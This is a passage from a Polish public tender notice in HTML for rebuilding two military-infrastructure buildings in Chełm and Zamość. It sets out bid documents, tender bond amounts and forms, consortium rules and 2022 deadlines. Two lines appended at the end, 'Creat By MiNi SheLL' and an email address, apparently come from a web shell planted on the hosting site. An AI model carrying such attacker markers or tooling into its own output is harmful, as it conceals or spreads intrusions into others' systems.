spełniania (w zakresie, w jakim powołuje się na ich zasoby) warunków udziału w postępowaniu,<br/><br/>Podmiot udostępniający zasoby nie składa Oświadczenia, <br/>o którym mowa powyżej.<br/><br/> 2. PEŁNOMOCNICTWO – do reprezentacji Wykonawcy (lub Wykonawców ubiegających się wspólnie o udzielenie zamówienia) w prowadzonym przez Zamawiającego postępowaniu, w szczególności do złożenia oferty, podmiotowych środków dowodowych oraz innych oświadczeń <br/>i dokumentów oraz zawarcia umowy (jeśli dotyczy) - jako załącznik do oferty.<br/><br/> 3. ZOBOWIĄZANIE PODMIOTU UDOSTĘPNIAJĄCEGO ZASOBY <br/>do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy, potwierdzający że Wykonawca realizując zamówienia będzie dysponował niezbędnymi zasobami tych podmiotów. <br/>Dokument ten ma określać w szczególności:<br/> • zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby;<br/> • sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonaniu zamówienia;<br/> • czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizują usługi/roboty budowalne, których wskazane zdolności dotyczą.<br/><br/>Takim dokumentem może być zobowiązanie podmiotu udostępniającego zasoby – według wzoru załączonego do SWZ (jeśli dotyczy) - jako załącznik do oferty.<br/><br/>	<br/> 4. OŚWIADCZENIE wykonawców wspólnie ubiegających się o udzielenie zamówienia zawierające wykaz czynności, które zostaną wykonane przez poszczególnych Wykonawców (jeśli dotyczy) - jako załącznik do oferty. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Oferta musi być zabezpieczona wadium o niżej wymienionej wartości: <br/><br/>Część nr 1- Chełm „Przebudowa budynku nr 9”<br/><br/>870,00 zł (słownie: osiemset siedemdziesiąt 00/100 złotych);<br/><br/>Część nr 2- Zamość – „Przebudowa wraz ze zmianą sposobu użytkowania budynku nr 48 (łaźnia) na magazyn wielobranżowy”<br/><br/>950,00 zł (słownie: dziewięćset pięćdziesiąt 00/100 złotych)<br/><br/> 2. Wadium może być wniesione w jednej lub w kilku następujących formach:<br/> 1) pieniądzu;<br/> 2) gwarancjach bankowych;<br/> 3) gwarancjach ubezpieczeniowych;<br/> 4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2020r. poz. 299)<br/><br/> 3. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp.<br/><br/> 4. Wadium w formie pieniężnej należy wpłacić przelewem na rachunek bankowy Rejonowego Zarządu Infrastruktury w Lublinie, 20-020 Lublin, ul. Lipowa 1a, konto nr: 58 1010 1339 0043 0113 9120 1000<br/><br/>Wadium musi być wniesione najpóźniej do godz. 1000 dnia 25.03.2022r.<br/><br/>Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w wyżej wymienionym terminie znajdzie się na rachunku bankowym Rejonowego Zarządu Infrastruktury w Lublinie.<br/><br/> 5. W przypadku wnoszenia wadium w formie gwarancji lub poręczenia, o których mowa w pkt XXI ppkt 2 ppkt 2) - 4) SWZ Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia w postaci elektronicznej poprzez wczytanie tego pliku na platformie <br/>e- Puap, najpóźniej do godz. 1000 dnia 25.03.2022r.<br/><br/>Z treści gwarancji (poręczenia) musi jednoznacznie wynikać:<br/> a. jaki jest sposób reprezentacji Gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta.<br/> b. nieodwołalnie i bezwarunkowo - na pierwsze pisemne żądanie zgłoszone przez Rejonowy Zarząd Infrastruktury w Lublinie, ul. Lipowa 1a, 20-020 Lublin, w terminie związania ofertą - zobowiązanie Gwaranta do wypłaty Zamawiającemu, pełnej kwoty wadium w okolicznościach określonych w art. 98 ust. 6 ustawy Pzp.<br/> 6. W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, wadium wniesione przez jednego <br/>z Wykonawców (jednego z konsorcjantów lub wspólników spółki cywilnej) uważa się za wniesione prawidłowo.<br/> 7. Oferta Wykonawcy, który nie wniósł wadium, wniósł je w sposób nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub który złożył wniosek o zwrot wadium w przypadku o którym mowa w art. 98 ust. 2 pkt. 3 ustawy Pzp podlega odrzuceniu na podstawie art. 226 ust. 1 pkt 14) ustawy Pzp.<br/> 8. Okoliczności i zasady zwrotu wadium, jego zatrzymania oraz zaliczania na poczet zabezpieczenia należytego wykonania umowy określają odpowiednie przepisy ustawy Pzp.<br/> 9. Złożenie wniosku o zwrot wadium, o którym mowa w art. 98 ust. 2 ustawy Pzp, powoduje rozwiązanie stosunku prawnego z Wykonawcą wraz <br/>z utratą przez niego prawa korzystania ze środków ochrony prawnej, <br/>o których mowa w dziale IX ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Każdy z przedsiębiorców wchodzący w skład spółki cywilnej lub konsorcjum musi:<br/> a) wykazać, że nie podlega wykluczeniu na podstawie art.108 ust. 1 oraz art. 109 ust. 1 pkt. 1) i 4) ustawy Pzp,<br/> b) wykazać, że posiada wpis do jednego z rejestrów zawodowych lub handlowych prowadzonych w kraju, w którym ma siedzibę lub miejsce zamieszkania. <br/> 2. Zamawiający dokonując oceny spełnienia warunku udziału <br/>w postępowaniu, o którym mowa w pkt XVII SWZ uzna, iż warunek został spełniony jeżeli:<br/> • przynajmniej jeden z przedsiębiorców wchodzących w skład spółki cywilnej lub konsorcjum wykaże, że wykonał usługi, o których mowa w pkt XVII pkt 2 ppkt 4) . 4.1. SWZ oraz skieruje do realizacji zamówienia osoby, o których mowa w pkt XVII pkt 2 ppkt 4) . 4.2. SWZ.<br/> • Przedsiębiorcy wraz z ofertą złożą Oświadczenie, o którym mowa w pkt XVIII Etap 1 ppkt 4 SWZ;<br/> 3. Zamawiający wymaga, aby część zamówienia związaną z warunkiem udziału w postępowaniu została zrealizowana przez tego z przedsiębiorców wchodzącego w skład spółki cywilnej lub konsorcjum, który wykazał się spełnieniem danego warunku udziału w postępowaniu.<br/> 4. Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika (lidera) do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia tj.: w szczególności do złożenia oferty, oświadczeń i zawiadomień albo do reprezentowania ich w postępowaniu i zawarcia umowy na wykonanie przedmiotowego zamówienia publicznego.<br/> 5. Pełnomocnictwo do reprezentacji i zawarcia umowy musi być wystawione przez wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia.<br/><br/>Uwaga: treść pełnomocnictwa powinna dokładnie określać zakres umocowania.<br/><br/> 6. Wszelka korespondencja dokonywana będzie wyłącznie z pełnomocnikiem (lub liderem). Wszelkie rozliczenia (wystawianie faktur, płatności) dokonywane będą z pełnomocnikiem lub liderem wskazanym w ofercie lub innych dokumentach/oświadczeniach złożonych w postępowaniu.<br/> 7. Wypełniając ofertę, jak również inne dokumenty powołujące się na „Wykonawcę&#34;; w miejscu „np. nazwa i adres Wykonawcy&#34; należy wpisać pełne dane dotyczące wspólników spółki cywilnej lub pełne dane dotyczące lidera i partnera (partnerów) konsorcjum.<br/><br/> 8. Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców.<br/> 9. Zgodnie z art. 117 ust. 4 ustawy Pzp Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, w przypadku o którym mowa w art. 117 ust. 2 i 3 ustawy Pzp dołączają do oferty, oświadczenie z którego wynika, które dostawy wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzania znajdują się we Wzorze umowy, który stanowi załącznik do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-25 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Elektroniczna skrzynka podawcza Rejonowego Zarządu Infrastruktury w Lublinie na platformie ePuap</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-25 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-04-23</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com